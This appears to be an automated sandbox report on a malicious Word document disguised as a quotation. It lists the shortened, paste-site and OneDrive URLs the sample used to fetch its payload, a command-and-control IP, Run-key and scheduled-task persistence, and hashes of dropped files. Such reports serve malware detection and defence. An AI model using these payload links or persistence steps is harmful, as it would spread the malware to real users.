      NameIPActiveMaliciousAntivirus DetectionReputation
      bit.ly
      		67.199.248.11
      		truefalse
        		high
        teknik.io
        		5.79.72.163
        		truefalse
          		high
          onedrive.live.com
          		unknown
          		unknownfalse
            		high
            ibkebw.dm.files.1drv.com
            		unknown
            		unknownfalse
              		high
              u.teknik.io
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                true
                • Avira URL Cloud: safe
                		low
                194.5.98.202true
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://bit.ly/2ZKf4aqfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.RegAsm.exe, 00000006.00000002.2372610828.0000000002790000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371587310.0000000001BE0000.00000002.00000001.sdmp, RegAsm.exe, 0000000F.00000002.2323283664.0000000002500000.00000002.00000001.sdmpfalse
                    		high
                    http://crl.entrust.net/server1.crl0RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpfalse
                      		high
                      http://ocsp.entrust.net03RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://onedrive.live.com/ERegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmpfalse
                        		high
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.%s.comPARegAsm.exe, 00000006.00000002.2372610828.0000000002790000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371587310.0000000001BE0000.00000002.00000001.sdmp, RegAsm.exe, 0000000F.00000002.2323283664.0000000002500000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		low
                        http://www.diginotar.nl/cps/pkioverheid0RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://u.teknik.io/wREzo.txt2ZKf4aq[1].htm.2.drfalse
                          		high
                          https://ibkebw.dm.files.1drv.com/yRegAsm.exe, 00000006.00000002.2382485610.000000001DC80000.00000004.00000001.sdmpfalse
                            		high
                            http://ocsp.entrust.net0DRegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://ibkebw.dm.files.1drv.com/RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmpfalse
                              		high
                              https://secure.comodo.com/CPS0RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpfalse
                                		high
                                https://onedrive.live.com/download?cid=802AC8A73EEC8C8E&resid=802AC8A73EEC8C8E%21110&authkey=AK1w6-PRegAsm.exe, RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmpfalse
                                  		high
                                  http://crl.entrust.net/2048ca.crl0RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpfalse
                                    		high
                                    https://ibkebw.dm.files.1drv.com/y4mkt1ePYl5p-A97ciot0bQ59hcBfLkczVR077g5LVTnsSoRxe1bs39ErOjDRD_qmHQRegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmp, RegAsm.exe, 00000006.00000002.2382485610.000000001DC80000.00000004.00000001.sdmpfalse
                                      		high
                                      https://onedrive.live.com/RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmpfalse
                                        		high

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        67.199.248.10
                                        		unknownUnited States
                                        		396982GOOGLE-PRIVATE-CLOUDUStrue
                                        5.79.72.163
                                        		unknownNetherlands
                                        		60781LEASEWEB-NL-AMS-01NetherlandsNLfalse
                                        194.5.98.202
                                        		unknownNetherlands
                                        		208476DANILENKODEtrue

                                        General Information

                                        Joe Sandbox Version:31.0.0 Emerald
                                        Analysis ID:358179
                                        Start date:25.02.2021
                                        Start time:07:28:29
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 8m 59s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:22
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winDOC@19/25@6/3
                                        EGA Information:Failed
                                        HDC Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 97%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found application associated with file extension: .doc
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                        • TCP Packets have been reduced to 100
                                        • Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.209, 2.20.142.210, 13.107.42.13, 13.107.42.12
                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, odc-web-brs.onedrive.akadns.net, odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-dm-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, l-0003.l-msedge.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, apps.identrust.com, au-bg-shim.trafficmanager.net
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        07:28:32API Interceptor46x Sleep call for process: EQNEDT32.EXE modified
                                        07:30:17API Interceptor77x Sleep call for process: 69577.exe modified
                                        07:30:25API Interceptor570x Sleep call for process: RegAsm.exe modified
                                        07:30:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\subfolder1\filename1.exe
                                        07:30:29Task SchedulerRun new task: SMTP Service path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" s>$(Arg0)
                                        07:30:29API Interceptor2x Sleep call for process: schtasks.exe modified
                                        07:30:29API Interceptor189x Sleep call for process: taskeng.exe modified
                                        07:30:31Task SchedulerRun new task: SMTP Service Task path: "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" s>$(Arg0)
                                        07:30:36AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                        07:30:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\subfolder1\filename1.exe

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        67.199.248.10DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                        • bit.ly/3aLCPVF
                                        PO AAN2102002-V020.docGet hashmaliciousBrowse
                                        • bit.ly/3pNzHgj
                                        PO55004.docGet hashmaliciousBrowse
                                        • bit.ly/3kioaoe
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                        • bit.ly/2NUvTNf
                                        RFQ Document.docGet hashmaliciousBrowse
                                        • bit.ly/3qOyCWN
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.docGet hashmaliciousBrowse
                                        • bit.ly/3qN5fEA
                                        Order.docGet hashmaliciousBrowse
                                        • bit.ly/3boWBW4
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                        • bit.ly/2NScGvD
                                        IMG_57109_Scanned.docGet hashmaliciousBrowse
                                        • bit.ly/3kemdsK
                                        Deadly Variants of Covid 19.docGet hashmaliciousBrowse
                                        • bit.ly/2Me6ei3
                                        swift payment.docGet hashmaliciousBrowse
                                        • bit.ly/2NmOCRI
                                        IMG_6078_SCANNED.docGet hashmaliciousBrowse
                                        • bit.ly/3qIRVRz
                                        IMG_01670_Scanned.docGet hashmaliciousBrowse
                                        • bit.ly/3duA4tQ
                                        IMG_7742_Scanned.docGet hashmaliciousBrowse
                                        • bit.ly/3sdTreK
                                        QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.docGet hashmaliciousBrowse
                                        • bit.ly/3dCBRgm
                                        DHL Shipment Notification 7465649870.docGet hashmaliciousBrowse
                                        • bit.ly/3bhrITG
                                        Quote QU038097.docGet hashmaliciousBrowse
                                        • bit.ly/3aom5Uu
                                        IMG_51067.doc__.rtfGet hashmaliciousBrowse
                                        • bit.ly/3djdyUC
                                        IMG_123773.docGet hashmaliciousBrowse
                                        • bit.ly/2Nsv9ym
                                        B62672021 PRETORIA.docGet hashmaliciousBrowse
                                        • bit.ly/3jOWhDW

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        bit.lyCsmBq6KLHu.docGet hashmaliciousBrowse
                                        • 67.199.248.11
                                        purchase order_2242021.docGet hashmaliciousBrowse
                                        • 67.199.248.11
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.docGet hashmaliciousBrowse
                                        • 67.199.248.11
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        PO AAN2102002-V020.docGet hashmaliciousBrowse
                                        • 67.199.248.11
                                        PO55004.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        RFQ Document.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        Order.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        QUOTE.docGet hashmaliciousBrowse
                                        • 67.199.248.11
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        IMG_57109_Scanned.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        Deadly Variants of Covid 19.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        swift payment.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        IMG_61061_SCANNED.docGet hashmaliciousBrowse
                                        • 67.199.248.11
                                        IMG_6078_SCANNED.docGet hashmaliciousBrowse
                                        • 67.199.248.11
                                        IMG_01670_Scanned.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        IMG_7742_Scanned.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        SWIFT Payment W0301.docGet hashmaliciousBrowse
                                        • 67.199.248.11

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        LEASEWEB-NL-AMS-01NetherlandsNLpurchase order_2242021.docGet hashmaliciousBrowse
                                        • 5.79.72.163
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.docGet hashmaliciousBrowse
                                        • 5.79.72.163
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                        • 5.79.72.163
                                        PO AAN2102002-V020.docGet hashmaliciousBrowse
                                        • 5.79.72.163
                                        PO55004.docGet hashmaliciousBrowse
                                        • 5.79.72.163
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                        • 5.79.72.163
                                        RFQ Document.docGet hashmaliciousBrowse
                                        • 5.79.72.163
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.docGet hashmaliciousBrowse
                                        • 5.79.72.163
                                        SecuriteInfo.com.Trojan.PackedNET.540.1271.exeGet hashmaliciousBrowse
                                        • 213.227.154.188
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                        • 5.79.72.163
                                        MV9tCJw8Xr.exeGet hashmaliciousBrowse
                                        • 5.79.70.250
                                        QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.docGet hashmaliciousBrowse
                                        • 5.79.72.163
                                        Quotation408S_A02021_AHYAN_group_of_companies.docGet hashmaliciousBrowse
                                        • 5.79.72.163
                                        Request For Quotation.PDF.exeGet hashmaliciousBrowse
                                        • 212.32.237.101
                                        PO#652.exeGet hashmaliciousBrowse
                                        • 5.79.87.207
                                        Parcel _009887 .exeGet hashmaliciousBrowse
                                        • 212.32.237.92
                                        PO 20211602.xlsmGet hashmaliciousBrowse
                                        • 82.192.82.225
                                        6d0000.exeGet hashmaliciousBrowse
                                        • 213.227.133.129
                                        SecuriteInfo.com.Trojan.PackedNET.541.9005.exeGet hashmaliciousBrowse
                                        • 62.212.86.139
                                        New Order 83329 PDF.exeGet hashmaliciousBrowse
                                        • 95.211.208.58
                                        GOOGLE-PRIVATE-CLOUDUSCsmBq6KLHu.docGet hashmaliciousBrowse
                                        • 67.199.248.11
                                        Details van vereiste.ppsGet hashmaliciousBrowse
                                        • 67.199.248.16
                                        purchase order_2242021.docGet hashmaliciousBrowse
                                        • 67.199.248.11
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.docGet hashmaliciousBrowse
                                        • 67.199.248.11
                                        Offerte aanvragen 22-02-2021.pptGet hashmaliciousBrowse
                                        • 67.199.248.16
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        PO AAN2102002-V020.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        PO55004.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        RFQ Document.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        Order.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        QUOTE.docGet hashmaliciousBrowse
                                        • 67.199.248.11
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        IMG_57109_Scanned.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        Deadly Variants of Covid 19.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        swift payment.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        IMG_61061_SCANNED.docGet hashmaliciousBrowse
                                        • 67.199.248.11
                                        IMG_6078_SCANNED.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        IMG_01670_Scanned.docGet hashmaliciousBrowse
                                        • 67.199.248.10
                                        DANILENKODEswift006.pdf.exeGet hashmaliciousBrowse
                                        • 194.5.97.116
                                        neue bestellung.PDF.exeGet hashmaliciousBrowse
                                        • 194.5.97.48
                                        m72OvSF7e5.exeGet hashmaliciousBrowse
                                        • 194.5.98.202
                                        neue bestellung.PDF.exeGet hashmaliciousBrowse
                                        • 194.5.97.48
                                        Eingang.Jpg.exeGet hashmaliciousBrowse
                                        • 194.5.97.116
                                        V33QokMrIv.exeGet hashmaliciousBrowse
                                        • 194.5.98.202
                                        3Fv4j323nj.exeGet hashmaliciousBrowse
                                        • 194.5.98.182
                                        scan09e8902093922023ce.exeGet hashmaliciousBrowse
                                        • 194.5.98.46
                                        PO AAN2102002-V020.docGet hashmaliciousBrowse
                                        • 194.5.98.182
                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.docGet hashmaliciousBrowse
                                        • 194.5.98.202
                                        neue bestellung.PDF.exeGet hashmaliciousBrowse
                                        • 194.5.97.48
                                        Orderoffer.exeGet hashmaliciousBrowse
                                        • 194.5.98.66
                                        neue bestellung.PDF.exeGet hashmaliciousBrowse
                                        • 194.5.97.48
                                        OrderSuppliesQuote0817916.exeGet hashmaliciousBrowse
                                        • 194.5.97.248
                                        DHL_6368638172 documento de recibo,pdf.exeGet hashmaliciousBrowse
                                        • 194.5.97.244
                                        QuotationInvoices.exeGet hashmaliciousBrowse
                                        • 194.5.97.248
                                        PAYMENT_.EXEGet hashmaliciousBrowse
                                        • 194.5.98.211
                                        payment.exeGet hashmaliciousBrowse
                                        • 194.5.98.66
                                        RFQ_1101983736366355 1101938377388.exeGet hashmaliciousBrowse
                                        • 194.5.98.21
                                        Slip copy .xls.exeGet hashmaliciousBrowse
                                        • 194.5.97.116

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        C:\Program Files (x86)\SMTP Service\smtpsvc.exePO AAN2102002-V020.docGet hashmaliciousBrowse
                                          DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.docGet hashmaliciousBrowse
                                            RFQ # TSI2202708.docGet hashmaliciousBrowse
                                              rfq_20712557-20200308 Order.docGet hashmaliciousBrowse
                                                31RFQ 49177 PO-DM-11-2018-109159.exeGet hashmaliciousBrowse
                                                  69shipment Details...exeGet hashmaliciousBrowse
                                                    64RFQ#4500052988_AHBGroup_017342213472103_20181024.exeGet hashmaliciousBrowse
                                                      22RFQ#4500052988_AHBGroup_017342213472103_20181024.exeGet hashmaliciousBrowse
                                                        41COSCO TBN FULLY SIGNED CPFN.exeGet hashmaliciousBrowse
                                                          19Request for Quote_Goedeker_6397_3 01-2_12137018.exeGet hashmaliciousBrowse
                                                            72Payment....exeGet hashmaliciousBrowse
                                                              832238740303837363.exeGet hashmaliciousBrowse
                                                                35Request for Quote_SOSi_6397_3 01-2_12137018.exeGet hashmaliciousBrowse
                                                                  61Request for Quote_SOSi_6397_3 01-2_12137018.exeGet hashmaliciousBrowse
                                                                    17Request for Quote_SOSi_6397_3 01-2_12137018.exeGet hashmaliciousBrowse
                                                                      59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221 (1).exeGet hashmaliciousBrowse
                                                                        71RFQ Ganix Global-180001899918 & 500037221.exeGet hashmaliciousBrowse
                                                                          81PAYMENT.exeGet hashmaliciousBrowse
                                                                            59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221.exeGet hashmaliciousBrowse
                                                                              2810010518.exeGet hashmaliciousBrowse

                                                                                Created / dropped Files

                                                                                C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):53248
                                                                                Entropy (8bit):4.48905382202799
                                                                                Encrypted:false
                                                                                SSDEEP:768:GP2Bbv+VazyoD2z9TU//1mz1+M9GnLEu+2hhFRJS8AW:tJv46yoD2BTNz1+M9GLfvw8AW
                                                                                MD5:246BB0F8D68A463FD17C235DEB5491C0
                                                                                SHA1:63F237F94EAB14CB4DCA7ACB5817644D4428873A
                                                                                SHA-256:32B60D7BBA22CC1682F4BA651D86C9FB357BDC82E9A284AB9668E5446BD24BB3
                                                                                SHA-512:187D08DF6563739A3A537439F313D9F4D53001FA8A9CD146986DAB3C1168E25E210771AFC2A7D6C2A88EB44F0EEF2E91DDCEA8ABD86742AD0E6D78F07BDF7996
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Joe Sandbox View:
                                                                                • Filename: PO AAN2102002-V020.doc, Detection: malicious, Browse
                                                                                • Filename: DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc, Detection: malicious, Browse
                                                                                • Filename: RFQ # TSI2202708.doc, Detection: malicious, Browse
                                                                                • Filename: rfq_20712557-20200308 Order.doc, Detection: malicious, Browse
                                                                                • Filename: 31RFQ 49177 PO-DM-11-2018-109159.exe, Detection: malicious, Browse
                                                                                • Filename: 69shipment Details...exe, Detection: malicious, Browse
                                                                                • Filename: 64RFQ#4500052988_AHBGroup_017342213472103_20181024.exe, Detection: malicious, Browse
                                                                                • Filename: 22RFQ#4500052988_AHBGroup_017342213472103_20181024.exe, Detection: malicious, Browse
                                                                                • Filename: 41COSCO TBN FULLY SIGNED CPFN.exe, Detection: malicious, Browse
                                                                                • Filename: 19Request for Quote_Goedeker_6397_3 01-2_12137018.exe, Detection: malicious, Browse
                                                                                • Filename: 72Payment....exe, Detection: malicious, Browse
                                                                                • Filename: 832238740303837363.exe, Detection: malicious, Browse
                                                                                • Filename: 35Request for Quote_SOSi_6397_3 01-2_12137018.exe, Detection: malicious, Browse
                                                                                • Filename: 61Request for Quote_SOSi_6397_3 01-2_12137018.exe, Detection: malicious, Browse
                                                                                • Filename: 17Request for Quote_SOSi_6397_3 01-2_12137018.exe, Detection: malicious, Browse
                                                                                • Filename: 59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221 (1).exe, Detection: malicious, Browse
                                                                                • Filename: 71RFQ Ganix Global-180001899918 & 500037221.exe, Detection: malicious, Browse
                                                                                • Filename: 81PAYMENT.exe, Detection: malicious, Browse
                                                                                • Filename: 59Doc_RFQ Roccia s.r.l. 180001899918 & 500037221.exe, Detection: malicious, Browse
                                                                                • Filename: 2810010518.exe, Detection: malicious, Browse
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,..S..................... .......... ........@.. ....................................@.....................................O................................... ................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                Category:dropped
                                                                                Size (bytes):59134
                                                                                Entropy (8bit):7.995450161616763
                                                                                Encrypted:true
                                                                                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):893
                                                                                Entropy (8bit):7.366016576663508
                                                                                Encrypted:false
                                                                                SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                                MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                                SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                                SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                                SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):328
                                                                                Entropy (8bit):3.080958610796429
                                                                                Encrypted:false
                                                                                SSDEEP:6:kKLKEbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:jM3kPlE99SNxAhUeo+aKt
                                                                                MD5:AD9008ACF5082FA8EB71D2E8C5BD9B96
                                                                                SHA1:11394AD7642601A83B356A265AC805C5E28A27AC
                                                                                SHA-256:4EE9FB4CE3E871D63A19C36B13F3AD281EB17EEAE99A9C13EC45CCC220B6DBCB
                                                                                SHA-512:B44C0F7E414E3405AA0DF081E723086E5FB08A622DF2BCDCEEBCC19C77C97D3946A7FB7D7EC34DF1DED51A28EDDA3432B2D206053A89BF5E5431E29974642B12
                                                                                Malicious:false
